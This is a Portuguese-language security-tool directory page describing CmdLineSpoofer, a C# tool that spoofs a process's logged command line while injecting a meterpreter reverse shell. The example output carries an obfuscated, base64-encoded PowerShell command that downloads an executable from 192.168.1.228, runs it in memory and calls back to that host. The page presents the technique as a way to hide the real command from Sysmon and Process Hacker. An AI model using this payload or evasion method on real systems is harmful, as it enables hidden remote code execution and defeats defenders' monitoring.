Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CmdLineSpoofer — Como falsificar a linha de comando ao gerar um novo processo a partir de C#. | Kitploit
Ferramentas/GitHubGitHub/plackyhacker/cmdlinespoofer
Escalada de PrivilégiosExploraçãoPós-ExploraçãoTestes de PenetraçãoComando e ControleAprendizado e EducaçãoRed TeamingDesenvolvimento de Payloads
GitHubplackyhacker/cmdlinespoofer

CmdLineSpoofer

Como falsificar a linha de comando ao gerar um novo processo a partir de C#.

Ver Repositório
11218há 4 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Spoofer de Linha de Comando

Um exemplo de uso de C# para injetar uma shell meterpreter enquanto falsifica a linha de comando. A linha de comando é armazenada no Bloco de Ambiente do Processo (PEB), é registrada quando um novo processo é iniciado e é exibida em ferramentas como Process Hacker e Gerenciador de Tarefas.

Introdução

Este código é baseado no blog How to Argue like Cobalt Strike de Adam Chester/XPN, que explica como o cobalt strike falsifica a linha de comando de um processo ao injetar um beacon.

Usei isso como base para criar uma versão em C# que gera um processo do PowerShell e injeta uma shell reversa meterpreter. É verdade que não há necessidade de um binário .Net para isso, mas demonstra como os comandos podem ser falsificados.

Um novo processo é iniciado em estado suspenso com um argumento de linha de comando falsificado.

O comando falsificado é registrado, mas somos capazes de alterar a linha de comando no PEB do processo. Quando a thread principal é retomada, o processo usa a nova linha de comando no PEB.

Exemplo

A execução do código é mostrada abaixo:

root@kitploit:~
[+] Spoofing command: powershell.exe nothing to see here! :-P
[+] Process spawned, PID: 8588
[+] PEB Address: 0x2B2366F000
[+] ProcessParameters Address: 0x1EF61560000
[+] CommandLine Address: 0x1EF615606BC
[+] Original CommandLine: powershell.exe nothing to see here! :-P                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       
[+] New CommandLine: powershell.exe -exec bypass -enc WwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACgASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAIgBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAxAC4AMgAyADgALwBwAC4AZQB4AGUAIgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAKQAuAEMAbwBuAHQAZQBuAHQAKQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAKAAsACAAWwBzAHQAcgBpAG4AZwBbAF0AXQAgACgAJwAxADkAMgAuADEANgA4AC4AMQAuADIAMgA4ACcALAAgAFsAcwB0AHIAaQBuAGcAXQAgACQAUABJAEQALAAgACcAMQAwACcAKQApACkAOwB3AGgAaQBsAGUAIAAoACQAdAByAHUAZQApAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwADAAMAB9AA== , written to process
[+] Resuming process

Este exemplo injeta uma shell reversa meterpreter usando PowerShell, mas é registrada com um argumento de linha de comando falsificado.

Prova de Conceito

O Sysmon registra a linha de comando original (falsificada):

Sysmon

O Process Hacker não revela o comando executado:

Process Hacker

Baixar ferramenta